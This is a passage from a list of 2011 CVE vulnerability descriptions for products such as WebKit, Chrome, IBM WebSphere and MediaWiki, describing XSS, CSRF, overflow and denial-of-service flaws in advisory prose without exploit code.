helper in Mojolicious before 1.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1839] IBM Rational Build Forge 7.1.0 uses the HTTP GET method during redirection from the authentication servlet to a PHP script, which makes it easier for context-dependent attackers to discover session IDs by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history. [CVE-2011-1838] Multiple cross-site scripting (XSS) vulnerabilities in TemplateLogin.pm in TWiki before 5.0.2 allow remote attackers to inject arbitrary web script or HTML via the origurl parameter to a (1) view script or (2) login script. [CVE-2011-1826] Open redirect vulnerability in the Administrative Console in CA Arcot WebFort Versatile Authentication Server (VAS) before 6.2.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2011-1825] Multiple cross-site scripting (XSS) vulnerabilities in the Administrative Console in CA Arcot WebFort Versatile Authentication Server (VAS) before 6.2.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1804] rendering/RenderBox.cpp in WebCore in WebKit before r86862, as used in Google Chrome before 11.0.696.71, does not properly render floats, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer." [CVE-2011-1800] Multiple integer overflows in the SVG Filters implementation in WebCore in WebKit in Google Chrome before 11.0.696.68 allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2011-1799] Google Chrome before 11.0.696.68 does not properly perform casts of variables during interaction with the WebKit engine, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2011-1797] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-1776] The is_gpt_valid function in fs/partitions/efi.c in the Linux kernel before 2.6.39 does not check the size of an Extensible Firmware Interface (EFI) GUID Partition Table (GPT) entry, which allows physically proximate attackers to cause a denial of service (heap-based buffer overflow and OOPS) or obtain sensitive information from kernel heap memory by connecting a crafted GPT storage device, a different vulnerability than CVE-2011-1577. [CVE-2011-1774] WebKit in Apple Safari before 5.0.6 has improper libxslt security settings, which allows remote attackers to create arbitrary files, and consequently execute arbitrary code, via a crafted web site. NOTE: this may overlap CVE-2011-1425. [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element. [CVE-2011-1765] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.5, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .shtml at the end of the query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1578 and CVE-2011-1587. [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011. [CVE-2011-1744] EMC Captiva eInput 2.1.1 before 2.1.1.37 does not restrict the origin of calls to ActiveX functions, which allows remote attackers to read arbitrary files or cause a denial of service via a crafted web site. [CVE-2011-1743] Cross-site scripting (XSS) vulnerability in EMC Captiva eInput 2.1.1 before 2.1.1.37 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1738] HP Palm webOS 1.4.5 and 1.4.5.1 does not properly restrict Plug-in Development Kit (PDK) applications, which allows local users to gain privileges by leveraging unintended filesystem write access. [CVE-2011-1737] Multiple cross-site scripting (XSS) vulnerabilities in the Email application in HP Palm webOS 1.4.5 and 1.4.5.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1727] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.54, 10.13, 11.01, and 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to an "HTML injection" issue. [CVE-2011-1726] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.54, 10.13, 11.01, and 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1723] Cross-site scripting (XSS) vulnerability in app/views/layouts/base.rhtml in Redmine 1.0.1 through 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to projects/hg-helloworld/news/. NOTE: some of these details are obtained from third party information. [CVE-2011-1721] Cross-site request forgery (CSRF) vulnerability in php/partie_administrateur/administration.php in WebJaxe 1.02 allows remote attackers to hijack the authentication of administrators for requests that (1) modify passwords or (2) add new projects. NOTE: some of these details are obtained from third party information. [CVE-2011-1719] Multiple stack-based buffer overflows in the Web Viewer ActiveX controls in CA Output Management Web Viewer 11.0 and 11.5 allow remote attackers to execute arbitrary code via (1) a long SRC property value to the PPSViewer ActiveX control in PPSView.ocx before 1.0.0.7 or (2) a long Title property value to the UOMWV_Helper ActiveX control in UOMWV_HelperActiveX.ocx before 11.5.0.1. [CVE-2011-1718] The Web Agents component in CA SiteMinder R6 before SP6 CR2 and R12 before SP3 CR2 does not properly handle multi-line headers, which allows remote authenticated users to conduct impersonation attacks and gain privileges via crafted data. [CVE-2011-1716] Multiple cross-site scripting (XSS) vulnerabilities in the Web UI in Xymon before 4.3.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1714] Cross-site scripting (XSS) vulnerability in framework/source/resource/qx/test/jsonp_primitive.php in QooxDoo 1.3 and possibly other versions, as used in eyeOS 2.2 and 2.3, and possibly other products allows remote attackers to inject arbitrary web script or HTML via the callback parameter. [CVE-2011-1709] GNOME Display Manager (gdm) before 2.32.2, when glib 2.28 is used, enables execution of a web browser with the uid of the gdm account, which allows local users to gain privileges via vectors involving the x-scheme-handler/http MIME type. [CVE-2011-1696] Cross-site scripting (XSS) vulnerability in Novell Identity Manager (aka IDM) User Application 3.5.0, 3.5.1, 3.6.0, 3.6.1, 3.7.0, and 4.0.0, and Identity Manager Roles Based Provisioning Module 3.6.0, 3.6.1, 3.7.0, and 4.0.0, allows remote attackers to inject arbitrary web script or HTML via the apwaDetail (aka apwaDetailId) parameter, aka Bug 692972. [CVE-2011-1691] The counterToCSSValue function in CSSComputedStyleDeclaration.cpp in the Cascading Style Sheets (CSS) implementation in WebCore in WebKit before r82222, as used in Google Chrome before 11.0.696.43 and other products, does not properly handle access to the (1) counterIncrement and (2) counterReset attributes of CSSStyleDeclaration data provided by a getComputedStyle method call, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code. [CVE-2011-1689] Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1687] Best Practical Solutions RT 3.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote authenticated users to obtain sensitive information by using the search interface, as demonstrated by retrieving encrypted passwords. [CVE-2011-1683] IBM WebSphere Application Server (WAS) 6.0.x through 6.0.2.43, 6.1.x before 6.1.0.37, and 7.0.x before 7.0.0.17 on z/OS, when a Local OS user registry or Federated Repository with RACF adapter is used, allows remote attackers to obtain unspecified application access via unknown vectors. [CVE-2011-1671] Cross-site scripting (XSS) vulnerability in app/controllers/todos_controller.rb in Tracks 1.7.2, 2.0RC2, and 2.0devel allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to todos/tag/. NOTE: some of these details are obtained from third party information. [CVE-2011-1670] Cross-site scripting (XSS) vulnerability in actions/add.php in InTerra Blog Machine 1.84, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the subject parameter to post_url/edit. [CVE-2011-1668] Cross-site scripting (XSS) vulnerability in search.php in AR Web Content Manager (AWCM) 2.1, 2.2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2011-1665] PHPBoost 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain backup SQL files via a direct request for predictable filenames in cache/backup/. [CVE-2011-1662] Cross-site scripting (XSS) vulnerability in Translation Management module 6.x before 6.x-1.21 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1660] Multiple cross-site scripting (XSS) vulnerabilities in the DataDynamics.Reports.Web class library in GrapeCity Data Dynamics Reports before 1.6.2084.14 allow remote attackers to inject arbitrary web script or HTML via (1) the reportName or (2) uniqueId parameter to CoreViewerInit.js, or the (3) uniqueId or (4) traceLevel parameter to CoreController.js, as reachable by CoreHandler.ashx. [CVE-2011-1655] The management.asmx module in the Management Web Service in the Unified Network Control (UNC) Server in CA Total Defense (TD) r12 before SE2 sends a cleartext response to unspecified getDBConfigSettings requests, which makes it easier for remote attackers to obtain database credentials, and subsequently execute arbitrary code, by sniffing the network, related to the UNCWS Web Service. [CVE-2011-1654] Directory traversal vulnerability in the Heartbeat Web Service in CA.Itm.Server.ManagementWS.dll in the Management Server in CA Total Defense (TD) r12 before SE2 allows remote attackers to execute arbitrary code via directory traversal sequences in the GUID parameter in an upload request to FileUploadHandler.ashx. [CVE-2011-1651] Cisco IOS XR 3.9.x and 4.0.x before 4.0.3 and 4.1.x before 4.1.1, when an SPA interface processor is installed, allows remote attackers to cause a denial of service (device reload) via a crafted IPv4 packet, aka Bug ID CSCto45095. [CVE-2011-1649] The Internet Streamer application in Cisco Content Delivery System (CDS) with software 2.5.7, 2.5.8, and 2.5.9 before build 126 allows remote attackers to cause a denial of service (Web Engine crash) via a crafted URL, aka Bug IDs CSCtg67333 and CSCth25341. [CVE-2011-1643] Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x, 7.x before 7.1(5b)su4, 8.0, and 8.5 before 8.5(1)su2 and Cisco Unified Presence Server 6.x, 7.x, 8.0, and 8.5 before 8.5xnr allow remote attackers to read database data by connecting to a query interface through an SSL session, aka Bug IDs CSCti81574, CSCto63060, CSCto72183, and CSCto73833. [CVE-2011-1599] manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header. [CVE-2011-1587] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.4, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .html located before a ? (question mark) in a query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1578. [CVE-2011-1578] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.3, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .html at the end of the query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character. [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030. [CVE-2011-1569] download.aspx in Douran Portal 3.9.7.8 allows remote attackers to obtain source code of arbitrary files under the web root via (1) a trailing ".", (2) a trailing space, or (3) mixed case in the FileNameAttach parameter. [CVE-2011-1551] SUSE openSUSE Factory assigns ownership of the /var/log/cobbler/ directory tree to the web-service user account, which might allow local users to gain privileges by leveraging access to this account during root filesystem operations by the Cobbler daemon. [CVE-2011-1542] Cross-site scripting (XSS) vulnerability in HP Systems Insight Manager (SIM) before 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1538] Open redirect vulnerability in HP Proliant Support Pack (PSP) before 8.7 allows remote authenticated users to redirect other users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2011-1537] Cross-site scripting (XSS) vulnerability in HP Proliant Support Pack (PSP) before 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1531] The webscan component in the Embedded Web Server (EWS) on the HP Photosmart D110 and B110 [CVE-2011-1524] Cross-site scripting (XSS) vulnerability in the management login GUI page in Symantec LiveUpdate Administrator (LUA) before 2.3 allows remote attackers to inject arbitrary web script or HTML via the username field, as demonstrated by injecting an IFRAME element into the event log, a different vulnerability than CVE-2011-0545. [CVE-2011-1523] Cross-site scripting (XSS) vulnerability in statusmap.c in statusmap.cgi in Nagios 3.2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the layer parameter. [CVE-2011-1518] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) 2.4.x before 2.4.10 and 3.x before 3.0.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1510] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus (SDP) before 8012 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. [CVE-2011-1507] Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections. [CVE-2011-1504] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA allows remote authenticated users to inject arbitrary web script or HTML via a blog title. [CVE-2011-1499] acl.c in Tinyproxy before 1.8.3, when an Allow configuration setting specifies a CIDR block, permits TCP connections from all IP addresses, which makes it easier for remote attackers to hide the origin of web traffic by leveraging the open HTTP proxy server. [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header. [CVE-2011-1492] steps/utils/modcss.inc in Roundcube Webmail before 0.5.1 does not properly verify that a request is an expected request for an external Cascading Style Sheets (CSS) stylesheet, which allows remote authenticated users to trigger arbitrary outbound TCP connections from the server, and possibly obtain sensitive information, via a crafted request. [CVE-2011-1491] The login form in Roundcube Webmail before 0.5.1 does not properly handle a correctly authenticated but unintended login attempt, which makes it easier for remote authenticated users to obtain sensitive information by arranging for a victim to login to the attacker's account and then compose an e-mail message, related to a "login CSRF" issue. [CVE-2011-1481] Multiple cross-site scripting (XSS) vulnerabilities in Francisco Burzi PHP-Nuke 8.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) sender_name or (2) sender_email parameter in a Feedback action to modules.php. [CVE-2011-1462] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-1457] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-1453] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-1449] Use-after-free vulnerability in the WebSockets implementation in Google Chrome before 11.0.696.57 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2011-1433] The (1) AgentInterface and (2) CustomerInterface components in Open Ticket Request System (OTRS) before 3.0.6 place cleartext credentials into the session data in the database, which makes it easier for context-dependent attackers to obtain sensitive information by reading the _UserLogin and _UserPW fields. [CVE-2011-1427] Multiple cross-site scripting (XSS) vulnerabilities in Kodak InSite 5.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Language parameter to Pages/login.aspx, (2) HeaderWarning parameter to Troubleshooting/DiagnosticReport.asp, or (3) User-Agent header to troubleshooting/speedtest.asp. [CVE-2011-1425] xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification. [CVE-2011-1424] The default configuration of ExShortcut\Web.config in EMC SourceOne Email Management before 6.6 SP1, when the Mobile Services component is used, does not properly set the localOnly attribute of the trace element, which allows remote authenticated users to obtain sensitive information via ASP.NET Application Tracing. [CVE-2011-1423] Cross-site scripting (XSS) vulnerability in RSA Data Loss Prevention (DLP) Enterprise Manager 8.x before 8.5 SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1422] Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in EMC RSA Adaptive Authentication On-Premise (AAOP) 2.x, 5.7.x, and 6.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088. [CVE-2011-1414] Cross-site scripting (XSS) vulnerability in the tibbr web server, as used in TIBCO tibbr 1.0.0 through 1.5.0 and tibbr Service 1.0.0 through 1.5.0, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1405] Cross-site scripting (XSS) vulnerability in Mahara before 1.3.6 allows remote authenticated users to inject arbitrary web script or HTML via vectors associated with HTML e-mail messages, related to artefact/comment/lib.php and interaction/forum/lib.php. [CVE-2011-1396] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote attackers to inject arbitrary web script or HTML via the reportType parameter to an unspecified component. [CVE-2011-1395] Cross-site scripting (XSS) vulnerability in imicon.jsp in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote attackers to inject arbitrary web script or HTML via the controlid parameter. [CVE-2011-1378] IBM WebSphere MQ 6.0 on OpenVMS, when the default rights of the MQM group are established, does not properly verify User Authorization File (UAF) data, which allows local users to kill listener processes and the command server via a control command. [CVE-2011-1377] The Web Services Security component in the Web Services Feature Pack before 6.1.0.41 for IBM WebSphere Application Server (WAS) 6.1 does not properly handle the enabling of WS-Security for a JAX-WS application, which has unspecified impact and attack vectors. [CVE-2011-1376] iscdeploy in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.43, 7.0 before 7.0.0.21, and 8.0 before 8.0.0.2 on the IBM i platform sets weak permissions under systemapps/isclite.ear/ and bin/client_ffdc/, which allows local users to read or modify files via standard filesystem operations. [CVE-2011-1371] Cross-site scripting (XSS) vulnerability in content/error.jsp in IBM WebSphere ILOG Rule Team Server 7.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors that trigger an Unknown Error document, a different vulnerability than CVE-2011-4171. [CVE-2011-1368] The JavaServer Faces (JSF) application functionality in IBM WebSphere Application Server 8.x before 8.0.0.1 does not properly handle requests, which allows remote attackers to read unspecified files via unknown vectors. [CVE-2011-1362] Cross-site scripting (XSS) vulnerability in the Installation Verification Test (IVT) application in the Install component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 and 7.0 before 7.0.0.19 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1308. [CVE-2011-1360] Multiple cross-site scripting (XSS) vulnerabilities in IBM HTTP Server 2.0.47 and earlier, as used in WebSphere Application Server and other products, allow remote attackers to inject arbitrary web script or HTML via vectors involving unspecified documentation files in (1) manual/ibm/ and (2) htdocs//manual/ibm/. [CVE-2011-1359] Directory traversal vulnerability in the administration console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41, 7.0 before 7.0.0.19, and 8.0 before 8.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2011-1357] Cross-site scripting (XSS) vulnerability in agentDetect.jsp in the web UI in IBM WebSphere Service Registry and Repository (WSRR) 6.3 before 6.3.0.5, 7.0 before 7.0.0.5, and 7.5 before 7.5.0.1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2011-1356] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.19 allows local users to obtain sensitive stack-trace information via a crafted Administration Console request. [CVE-2011-1355] Open redirect vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.19 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the logoutExitPage parameter. [CVE-2011-1344] Use-after-free vulnerability in WebKit, as used in Apple Safari before 5.0.5 [CVE-2011-1343] SQL injection vulnerability in the Web GUI in IBM Tivoli Netcool/OMNIbus before 7.3.0.4 allows remote attackers to execute arbitrary SQL commands via "dynamic SQL parameters." [CVE-2011-1340] Cross-site scripting (XSS) vulnerability in skins/plone_templates/default_error_message.pt in Plone before 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the type_name parameter to Members/ipa/createObject. [CVE-2011-1339] Cross-site scripting (XSS) vulnerability in Google Search Appliance before 5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1335] Cross-site scripting (XSS) vulnerability in Cybozu Office 6, 7, and 8 before 8.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "address book and user list functions." [CVE-2011-1334] Cross-site scripting (XSS) vulnerability in Cybozu Office 6, Cybozu Garoon 2.0.0 through 2.1.3, Cybozu Dezie before 6.1, Cybozu MailWise before 3.1, and Cybozu Collaborex before 1.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "downloading graphic files from the mail system." [CVE-2011-1333] Cross-site scripting (XSS) vulnerability in Cybozu Office 6 and Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via vectors related to "downloading graphic files from the bulletin board system." [CVE-2011-1332] Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-6570. [CVE-2011-1330] Cross-site scripting (XSS) vulnerability in WeblyGo 5.0 Pro/LE, 5.02 Pro/LE, 5.03 Pro/LE, 5.04 Pro/LE, and 5.10 Pro/LE allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1322] The SOAP with Attachments API for Java (SAAJ) implementation in the Web Services component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) via encrypted SOAP messages. [CVE-2011-1321] The AuthCache purge implementation in the Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 does not purge a user from the PlatformCredential cache, which might allow remote authenticated users to gain privileges by leveraging a group membership specified in an old RACF Object (aka RACO). [CVE-2011-1320] The Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15, when the Tivoli Integrated Portal / embedded WebSphere Application Server (TIP/eWAS) framework is used, does not properly delete AuthCache entries upon a logout, which might allow remote attackers to access the server by leveraging an unattended workstation. [CVE-2011-1319] The Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15 allows remote authenticated users to cause a denial of service (memory consumption) by using a Lightweight Third-Party Authentication (LTPA) token for authentication. [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted. [CVE-2011-1317] Memory leak in com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by sending many JSP requests that trigger large responses. [CVE-2011-1316] The Session Initiation Protocol (SIP) Proxy in the HTTP Transport component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (worker thread exhaustion and UDP messaging outage) by sending many UDP messages. [CVE-2011-1315] Memory leak in the messaging engine in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) via network connections associated with a NULL return value from a synchronous JMS receive call. [CVE-2011-1314] The Service Integration Bus (SIB) messaging engine in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (daemon hang) by performing close operations via network connections to a queue manager. [CVE-2011-1313] Double free vulnerability in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15 allows remote backend IIOP servers to cause a denial of service (S0C4 ABEND and storage corruption) by rejecting IIOP requests at opportunistic time instants, as demonstrated by requests associated with an ORB_Request::getACRWorkElementPtr function call. [CVE-2011-1312] The Administrative Console component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.31 and 7.x before 7.0.0.15 does not prevent modifications of the primary admin id, which allows remote authenticated administrators to bypass intended access restrictions by mapping a (1) user or (2) group to an administrator role. [CVE-2011-1311] The Security component in IBM WebSphere Application Server (WAS) before 7.0.0.15, when a J2EE 1.4 application is used, determines the security role mapping on the basis of the ibm-application-bnd.xml file instead of the intended ibm-application-bnd.xmi file, which might allow remote authenticated users to gain privileges in opportunistic circumstances by requesting a service. [CVE-2011-1310] The Administrative Scripting Tools component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15, when tracing is enabled, places wsadmin command parameters into the (1) wsadmin.traceout and (2) trace.log files, which allows local users to obtain potentially sensitive information by reading these files. [CVE-2011-1309] The Plug-in component in IBM WebSphere Application Server (WAS) before 7.0.0.15 does not properly handle trace requests, which has unspecified impact and attack vectors. [CVE-2011-1308] Cross-site scripting (XSS) vulnerability in the Installation Verification Test (IVT) application in the Install component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1307] The installer in IBM WebSphere Application Server (WAS) before 7.0.0.15 uses 777 permissions for a temporary log directory, which allows local users to have unintended access to log files via standard filesystem operations, a different vulnerability than CVE-2009-1173. [CVE-2011-1300] The Program::getActiveUniformMaxLength function in libGLESv2/Program.cpp in libGLESv2.dll in the WebGLES library in Almost Native Graphics Layer Engine (ANGLE), as used in Mozilla Firefox 4.x before 4.0.1 on Windows and in the GPU process in Google Chrome before 10.0.648.205 on Windows, allows remote attackers to execute arbitrary code via unspecified vectors, related to an "off-by-three" error. [CVE-2011-1295] WebKit, as used in Google Chrome before 10.0.648.204 and Apple Safari before 5.0.6, does not properly handle node parentage, which allows remote attackers to cause a denial of service (DOM tree corruption), conduct cross-site scripting (XSS) attacks, or possibly have unspecified other impact via unknown vectors. [CVE-2011-1290] Integer overflow in WebKit, as used on the Research In Motion (RIM) BlackBerry Torch 9800 with firmware 6.0.0.246, in Google Chrome before 10.0.648.133, and in Apple Safari before 5.0.5, allows remote attackers to execute arbitrary code via unknown vectors related to CSS "style handling," nodesets, and a length value, as demonstrated by Vincenzo Iozzo, Willem Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1288] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1258] Microsoft Internet Explorer 6 through 8 does not properly restrict web script, which allows user-assisted remote attackers to obtain sensitive information from a different (1) domain or (2) zone via vectors involving a drag-and-drop operation, aka "Drag and Drop Information Disclosure Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1246] Microsoft Internet Explorer 8 does not properly handle content settings in HTTP responses, which allows remote web servers to obtain sensitive information from a different (1) domain or (2) zone via a crafted response, aka "MIME Sniffing Information Disclosure Vulnerability." [CVE-2011-1245] Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Javascript Information Disclosure Vulnerability." [CVE-2011-1244] Microsoft Internet Explorer 6, 7, and 8 does not enforce intended domain restrictions on content access, which allows remote attackers to obtain sensitive information or conduct clickjacking attacks via a crafted web site, aka "Frame Tag Information Disclosure Vulnerability." [CVE-2011-1224] IBM WebSphere MQ 6.0 before 6.0.2.11 and 7.0 before 7.0.1.5 does not 